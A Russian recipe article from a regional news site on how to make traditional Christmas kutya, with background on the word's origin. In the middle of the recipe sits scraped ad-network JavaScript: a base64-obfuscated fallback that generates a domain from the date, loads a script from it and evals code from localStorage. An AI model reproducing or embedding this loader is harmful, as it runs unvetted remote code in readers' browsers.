Кутья на Рождество: простой классический рецепт вкусного блюда

Кутья на Рождество — непременный атрибут любого праздничного стола.

В Святвечир или Сочельник кутья обязательно должна быть на праздничном столе.

Изначально слово «кутья» произошло от древнегреческого выражения, которое в дословном переводе означает «вареное зерно». На Руси слово «кут» означало веселье и радость, отсюда же пошло и слово «кутить», то есть гулять, веселиться. Само слово «кутья» в дословном переводе означает «радуюсь я».

Рассказываем вам о простом рецепте вкусной кутьи Из чего готовить кутью

Готовят кутью, как правило, из разнообразной крупы или зерна: пшеницы, перловки, ячменя, риса, овса, а иногда даже гречки. Заправляют кутью традиционно жидким медом, иногда разводят компотом или узваром. По желанию в кутью можно добавлять разнообразные сухофрукты, замороженные или свежие фрукты и ягоды, а также всевозможные специи и пряности. Все зависит от вашей фантазии и вкусовых предпочтений.

Ниже предлагаем вам рецепт классической кутьи: var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }

Ингредиенты:

пшеница – 400 гизюм – 200 гмак – 100 ггрецкие орехи – 200 гмед – по вкусусоль – щепоткавода – 1,2 л

Приготовление:

Кутью промыть теплой водой. Залить теплой водой и оставить на 12 часов при комнатной температуре. После этого воду слить.В кастрюлю влить воду. Для приготовления кутьи используем пропорции 1/3: то есть на 100 г пшеницы нужно использовать 300 мл холодной воды. Поставить кастрюлю на огонь, довести воду до кипения, всыпать щепотку соли, затем – пшеницу.Варить пшеницу на среднем огне с момента закипания 30-40 минут, периодически помешивая. Крупа должна полностью приготовиться (то есть быть мягкой), однако вода должна выкипеть не вся.Готовую пшеницу охладить. Добавить мед по вкусу, перемешать и отставить до полного остывания.В глубокую тарелку высыпать мак, залить его кипятком, накрыть крышкой и оставить на 15 минут.Измельчить грецкие орехи. Изюм залить кипятком и дать настояться 10 минут. Затем слить воду и обсушить бумажными полотенцами.Слить воду с мака. Добавить две столовые ложки орехов и взбить все блендером.В пшеницу всыпать изюм, орехи и мак. Все хорошо перемешать. При подаче украсить изюмом или орехами.

С Наступающим Рождеством! (adsbygoogle = window.adsbygoogle || []).push({});

Подписывайтесь на Акцент в Источник: https://akzent.zp.ua/kutya-na-rozhdestvo-prostoj-klassicheskij-retsept-vkusnogo-blyuda/

Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook

Share this post

Добавить комментарий

scroll to top